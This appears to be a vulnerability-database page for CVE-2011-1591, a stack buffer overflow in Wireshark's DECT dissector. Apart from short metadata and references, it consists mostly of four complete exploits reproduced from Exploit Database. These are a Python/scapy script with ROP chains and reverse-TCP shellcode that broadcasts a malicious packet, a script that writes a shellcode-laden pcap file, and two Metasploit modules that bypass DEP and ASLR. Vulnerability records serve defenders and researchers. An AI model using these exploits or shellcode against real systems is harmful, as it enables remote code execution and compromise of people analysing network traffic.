CVE-2011-1591: Details


Type: Overflow
83.33% V3
Access vector: Network
Published: 2011-04-29 20:00 +00:00
Last modified: 2017-09-18 10:57 +00:00

CVE Description

Stack-based buffer overflow in the DECT dissector in epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows remote attackers to execute arbitrary code via a crafted .pcap file.

CVE Information

Related Weaknesses

CWE-ID    Weakness name                                                              Source
CWE-119   Improper Restriction of Operations within the Bounds of a Memory Buffer
          The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric   Score   Severity   CVSS Vector                    Source
V2       9.3                AV:N/AC:M/Au:N/C:C/I:C/A:C     nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 18145

Publication date: 2011-11-21 23:00 +00:00
Author: ipv
EDB Verified: No

#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-

a = """
\n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n
#
# -------- Team : Consortium-of-Pwners
# -------- Author : ipv
# -------- Impact : high
# -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
# -------- Description
#
# This code exploits a remote stack based buffer overflow in the DECT dissector of
# wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to
# shellcode located the payload.
# All the process is automated, and bypass any NX/ALSR.
#
# Operating Systems tested : [see the summary] with scapy >= 2.5
# For any comments, remarks, news, please mail me : ipv _at_ [team] . net
###########################################################################\n"""

import sys, struct

if sys.version_info >= (2, 5):
    from scapy.all import *
else:
    from scapy import *

# align
def _x(v):
    return struct.pack("<I", v)

# Gadget Table - Arch linux v2010.05 default package
# - wireshark-cli-1.4.3-1-i686.pkg.tar.xz
# - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
arch_rop_chain = [
    # Safe SEIP overwrite
    _x(0x8069acb),            # pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x80e9360), _x(0),  # fake (arg1, arg2, arg3), to avoid crash
    # mprotect 1st arg : stack & 0xffff0000
    _x(0x8067d90),            # push esp ; pop ebp
    _x(0x8081f2e),            # xchg ebp eax
    _x(0x80f9d7f),            # xchg ecx, eax
    _x(0x8061804),            # pop eax
    _x(0xffff0000),           #
    _x(0x80c69f0),            # xchg edi, eax
    _x(0x80ff067),            # and ecx edi ; dec ecx
    _x(0x8077c53),            # inc ecx ; sub al 0x5d
    _x(0x8061804),            # pop eax
    _x(0x7f16a5d0),           # avoid crash with dec dword [ecx-0x76fbdb8c]
    _x(0x8048360),            # xchg ecx eax
    _x(0x8089f46),            # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c]
    _x(0x8067d90),            # push esp ; pop ebp
    _x(0x8081f2e),            # xchg ebp eax
    _x(0x8067d92)*7,          # ret
    # 1st arg of mprotect is on esp+48 address (see below)
    _x(0x80745f9),            # mov [eax+0x50] edx ; pop ebp
    _x(0),
    # we search address of mprotect (@mprotect = @fopen + 0x6fe70)
    _x(0x8065226),            # pop eax
    _x(0x81aca20-0xc),        # got[fopen]
    _x(0x8074597),            # mov eax [eax+0xc]
    _x(0x8048360),            # xchg ecx eax
    _x(0x8065226),            # pop eax
    _x(0x6fe70),
    _x(0x8081f2e),            # xchg ebp eax
    _x(0x806973d),            # add ecx ebp
    _x(0x08104f61),           # jmp *%ecx
    _x(0x0811eb63),           # pop ebx, pop esi, pop edi
    # mprotect args (base_addr, page size, mode)
    _x(0),                    # Stack Map that is updated dynamically (see upper)
    _x(0x10000),              # PAGE size 0x1000
    _x(0x7),                  # RWX Mode
    # now we can jump to our lower addressed shellcode by decreasing esp register
    _x(0x8061804),            # pop eax
    _x(0xff+0x50),            # esp will be decreased of 0xff + 0x50 bytes;
    _x(0x80b8fc8),            # xchg edi eax
    _x(0x8067d90),            # push esp ; pop ebp
    _x(0x80acc63),            # sub ebp, edi ; dec ecx
    _x(0x8081f2e),            # xchg ebp eax
    _x(0x0806979e)            # jmp *eax
]

# Gadget Table - Bt4 compiled without SSP/FortifySource
# Source wireshark 1.4.3
labs_rop_chain = [
    # Safe SEIP overwrite
    _x(0x08073fa1),           # pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x0808c4d3), _x(0),  # fake (arg1, arg2, arg3), to avoid crash
    # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode
    # mprotect 3rd arg
    _x(0x080e64cf),           # pop edx ; pop es ; add cl cl
    _x(0x7), _x(0x0),         # RWX mode 0x7
    # mprotect 1st arg (logical AND with stack address to get address base),
    _x(0x080a1711),           # mov edi esp ; dec ecx
    _x(0x0815b74f),           # pop ecx
    _x(0xffff0000),           #
    _x(0x0804c73c),           # xchg ecx eax
    _x(0x080fadd7),           # and edi eax ; dec ecx
    _x(0x0804c73c),           # xchg ecx eax
    _x(0x080af344),           # mov ebx edi ; dec ecx
    # mprotect 2nd arg
    _x(0x0815b74f),           # pop ecx
    _x(0x10000),              # PAGE size 0x10000
    # int 0x80 : here vdso is not randomized, so, we use it!
    _x(0x80d8b71),            # pop eax
    _x(0x7D),                 # 0x7D = mprotect syscall
    _x(0x804e6df),            # pop *esi
    _x(0xffffe411),           # int 0x80
    # _x(0xffffe414),         # @sysenter in .vdso
    _x(0x080ab949),           # jmp *esi
    # now we can jump to our lower addressed shellcode by decreasing esp register
    _x(0x0815b74f),           # pop ecx
    _x(256),                  # esp will be decreased of 256bytes
    _x(0x080a1711),           # mov edi esp ; dec ecx
    _x(0x081087d3),           # sub edi ecx ; dec ecx
    _x(0x080f7cb1)            # jmp *edi
]

addr_os = {
    # ID    # OS                       # STACK SIZE  # GADGET TABLE
     1 : ["Arch Linux 2010.05 ",      0xb9, arch_rop_chain],  # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
     2 : ["Labs test ",               0xbf, labs_rop_chain],
    -1 : ["Debian 5.0.8 Lenny ",      -3,   False],  # wireshark_1.0.2-3+lenny12_i386.deb
    -2 : ["Debian 6.0.2 Squeeze ",    -1,   False],  # wireshark_1.2.11-6+squeeze1_i386.deb
    -3 : ["Fedora 14 ",               -1,   False],  # wireshark-1.4.3-1.2.2.i586.rpm
    -4 : ["OpenSuse 11.3 ",           -1,   False],  # wireshark-1.4.3-1.2.2.i586.rpm
    -5 : ["Ubuntu 10.10 | 11.04 ",    -1,   False],  #
    -6 : ["Gentoo * ",                -2,   False]   #
}

print a

def usage():
    print "Please select and ID >= 0 :\n"
    print " ID  TARGET                  INFO"
    print "--------------------------------------------------------------------"
    for i in addr_os.iteritems():
        print " %2d -- %s "%(i[0], i[1][0]),
        if i[1][1] == -1:
            print "Default package uses LibSSP & Fortify Source"
        elif i[1][1] == -2:
            print "Compiled/Build with Fortify Source"
        elif i[1][1] == -3:
            print "DECT protocol not supported"
        else:
            print "VULN -> Stack size %d"%(i[1][1])
    sys.exit(1)

if len(sys.argv) == 1:
    usage()
elif addr_os.has_key(int(sys.argv[1])) is False:
    usage()
elif int(sys.argv[1]) < 0:
    usage()

target = addr_os[int(sys.argv[1])]
print "\n[+] Target : %s"%target[0]

rop_chain = "".join([ rop for rop in target[2]])

# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C
rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

SEIP_SMASH = target[1]
print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)

nopsled = "\x90"
head_nop = 50
shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop)
payload = shellcode + rop_chain

# stack alignment
if (len(payload) % 2):
    diff = len(payload) % 2
    payload = payload[(2-diff):]

print "\t[+] Payload length : %d"%len(payload)

evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload
# evil_packet.show()
print "\t[+] Evil packet length : %d"%len(evil_packet)
print "\t[+] Sending packet to broadcast"
sendp(evil_packet)
Exploit Database EDB-ID: 17185

Publication date: 2011-04-17 22:00 +00:00
Author: sickness
EDB Verified: Yes

#!/usr/bin/env python
# Vulnerable app: Wireshark 1.4.1-1.4.4
# Author: sickness
# Download :
# OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit)
# DATE : 17.04.2011
# Fixed in latest version 1.4.5
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# Offset might change!
# Watch out for other bad chars!!
# Current bad chars: \x00\x0a\x0d\x09
###################################################################
# References:
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
###################################################################

import sys
from scapy.all import *

#payload=calc.exe
#ppr is from a non-ASLR enabled wireshark module
evil = Ether(type=0x2323)/(
    "\x41" * 1239 +
    "\xeb\x06\x90\x90" +
    "\x5D\x10\x94\x62" +
    "\x90" * 16 +
    "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a" +
    "\x90" * 4500)
wrpcap("evil.pcap",evil)

print "\n"
print "Evil .pcap file created!"
print "It's pwnsauce time!\n"
Exploit Database EDB-ID: 17186

Publication date: 2011-04-18 22:00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: wireshark_packet_dect.rb 12364 2011-04-19 07:53:58Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Wireshark <= 1.4.4
        When opening a malicious .pcap file in Wireshark, a stack buffer occurs,
        resulting in arbitrary code execution. This exploit bypasses DEP & ASLR
        and works on XP, Vista & Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sickness',     #found the vulnerabilitiy
          'corelanc0d3r'  #rop exploit + msf module
        ],
      'Version'        => '$Revision: 12364 $',
      'References'     =>
        [
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/17185' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 936,
          'DisableNops' => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ '32-bit Windows Universal (Generic DEP & ASLR Bypass)',
            {
              'OffSet' => 1243,
              'Ret'    => 0x667c484d,  #libgnutl pivot - tx Lincoln
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 18 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']),
      ], self.class)
  end

  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    global_header = "\xd4\xc3\xb2\xa1"       # magic_number
    global_header << "\x02\x00"              # major version
    global_header << "\x04\x00"              # minor version
    global_header << "\x00\x00\x00\x00"      # GMT to local correction
    global_header << "\x00\x00\x00\x00"      # accuracy
    global_header << "\xff\x7f\x00\x00"      # snaplen
    global_header << "\x01\x00\x00\x00"      # data link type

    packet_header = "\x26\x32\xac\x4d"       #timestamp seconds
    packet_header << "\xda\xfa\x00\x08"      #timestamp microseconds
    packet_header << "\x04\x06\x00\x00"      #nr of octets of packet in file
    packet_header << "\x04\x06\x00\x00"      #actual size of packet (1540)

    ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23"

    print_status("Preparing payload")
    pivot = [target.ret].pack('V')

    # pvefindaddr rop 'n roll
    # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
    rop_pivot = [
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x64f9d5ec,  # ADD ESP,0C # RET - libfontconfig-1.dll
      0x618d7d0e,  # RET <- don't count on this one !
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x61C14268,  # ADD ESP,24 # RETN - freetype6.dll
      0xFFFFFFFF,  # crash baby !
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
    ].pack("V*")

    rop_gadgets = [
      0x6d7155cb,  # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll]
      junk,
      0x6d596e31,  # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x61c14552,  # POP EBX # RETN ** [freetype6.dll]
      0x00000800,  # size - 0x800 should be more than enough
      0x61c14043,  # POP ESI # RETN ** [freetype6.dll]
      0x0000009C,
      0x6d58321a,  # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x68610a27,  # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll]
      0x629445a6,  # POP EAX # RETN ** [libatk-1.0-0.dll]
      0x62d9027c,  #
      0x6c385913,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll]
      0x617bc526,  # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll]
      0x64f8c692,  # POP EDX # RETN ** [libfontconfig-1.dll]
      0x00000040,  #
      0x619638db,  # POP ECX # RETN ** [libgtk-win32-2.0-0.dll]
      0x6536B010,  # RW
      0x618d7d0d,  # POP EDI # RETN ** [libgtk-win32-2.0-0.dll]
      0x618d7d0e,  # RET
      0x64fa0c15,  # POP EAX # RETN ** [libfontconfig-1.dll]
      0x618d7d0e,  # RET
      0x61963fdb,  # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll]
    ].pack("V*")

    pivot = [target.ret].pack('V')

    buffer = rand_text(131)
    buffer << rop_pivot
    buffer << rop_gadgets
    nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length))
    buffer << nops
    buffer << payload.encoded
    buffer << pivot
    filler = 1540 - buffer.length
    buffer << rand_text(filler)

    filecontent = global_header
    filecontent << packet_header
    filecontent << ptype
    filecontent << buffer

    print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
    file_create(filecontent)
  end
end
Exploit Database EDB-ID: 17195

Publication date: 2011-04-18 22:00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: wireshark_packet_dect.rb 12371 2011-04-19 16:41:58Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Capture

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Wireshark <= 1.4.4
        by sending an malicious packet.)
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Paul Makowski',  #Initial discovery
          'sickness',       #proof of concept
          'corelanc0d3r',   #rop exploit + msf module
        ],
      'Version'        => '$Revision: 12371 $',
      'References'     =>
        [
          [ 'CVE', '2011-1591'],
          [ 'OSVDB', '71848'],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/17185' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 936,
          'DisableNops' => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Win32 Universal (Generic DEP & ASLR Bypass)',
            {
              'OffSet' => 1243,
              'Ret'    => 0x667c484d,  #libgnutl pivot - tx Lincoln
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 18 2011',
      'DefaultTarget'  => 0))

    register_options([
      OptBool.new('LOOP', [true, 'Send the packet every X seconds until the job is killed', false]),
      OptInt.new('DELAY', [true, 'This option sets the delay between sent packets', 5])
    ], self.class)

    register_advanced_options([
      OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]),
    ], self.class)

    deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN','TIMEOUT','UDP_SECRET','NETMASK','GATEWAY')
  end

  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit
    ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23"

    print_status("Preparing payload")
    pivot = [target.ret].pack('V')

    # pvefindaddr rop 'n roll
    # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
    rop_pivot = [
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x64f9d5ec,  # ADD ESP,0C # RET - libfontconfig-1.dll
      0x618d7d0e,  # RET <- don't count on this one !
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x61C14268,  # ADD ESP,24 # RETN - freetype6.dll
      0xFFFFFFFF,  # crash baby !
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
    ].pack("V*")

    rop_gadgets = [
      0x6d7155cb,  # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll]
      junk,
      0x6d596e31,  # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x61c14552,  # POP EBX # RETN ** [freetype6.dll]
      0x00000800,  # size - 0x800 should be more than enough
      0x61c14043,  # POP ESI # RETN ** [freetype6.dll]
      0x0000009C,
      0x6d58321a,  # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x68610a27,  # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll]
      0x629445a6,  # POP EAX # RETN ** [libatk-1.0-0.dll]
      0x62d9027c,  #
      0x6c385913,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll]
      0x617bc526,  # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll]
      0x64f8c692,  # POP EDX # RETN ** [libfontconfig-1.dll]
      0x00000040,  #
      0x619638db,  # POP ECX # RETN ** [libgtk-win32-2.0-0.dll]
      0x6536B010,  # RW
      0x618d7d0d,  # POP EDI # RETN ** [libgtk-win32-2.0-0.dll]
      0x618d7d0e,  # RET
      0x64fa0c15,  # POP EAX # RETN ** [libfontconfig-1.dll]
      0x618d7d0e,  # RET
      0x61963fdb,  # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll]
    ].pack("V*")

    pivot = [target.ret].pack('V')

    buffer = rand_text(131)
    buffer << rop_pivot
    buffer << rop_gadgets
    nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length))
    buffer << nops
    buffer << payload.encoded
    buffer << pivot
    filler = 1500 - buffer.length
    buffer << rand_text(filler)

    pkt = ptype
    pkt << buffer

    print_status("Sending malicious packet")
    open_pcap()
    handler
    if datastore['LOOP']
      while true
        break if session_created? and datastore['ExitOnSession']
        inject(pkt)
        select(nil,nil,nil,datastore['DELAY'])
      end
    else
      inject(pkt)
    end
    close_pcap
  end
end

Products Mentioned

Configuration 0

Wireshark >> Wireshark >> Version 1.4.0
Wireshark >> Wireshark >> Version 1.4.1
Wireshark >> Wireshark >> Version 1.4.2
Wireshark >> Wireshark >> Version 1.4.3
Wireshark >> Wireshark >> Version 1.4.4

References

http://www.exploit-db.com/exploits/17185 (tags: exploit, x_refsource_EXPLOIT-DB)
http://www.mandriva.com/security/advisories?name=MDVSA-2011:083 (tags: vendor-advisory, x_refsource_MANDRIVA)
http://www.exploit-db.com/exploits/17195 (tags: exploit, x_refsource_EXPLOIT-DB)
http://openwall.com/lists/oss-security/2011/04/18/8 (tags: mailing-list, x_refsource_MLIST)
http://secunia.com/advisories/44374 (tags: third-party-advisory, x_refsource_SECUNIA)
http://www.osvdb.org/71848 (tags: vdb-entry, x_refsource_OSVDB)
http://secunia.com/advisories/44172 (tags: third-party-advisory, x_refsource_SECUNIA)
http://securitytracker.com/id?1025389 (tags: vdb-entry, x_refsource_SECTRACK)
http://www.vupen.com/english/advisories/2011/1022 (tags: vdb-entry, x_refsource_VUPEN)
http://www.kb.cert.org/vuls/id/243670 (tags: third-party-advisory, x_refsource_CERT-VN)
http://openwall.com/lists/oss-security/2011/04/18/2 (tags: mailing-list, x_refsource_MLIST)
http://www.vupen.com/english/advisories/2011/1106 (tags: vdb-entry, x_refsource_VUPEN)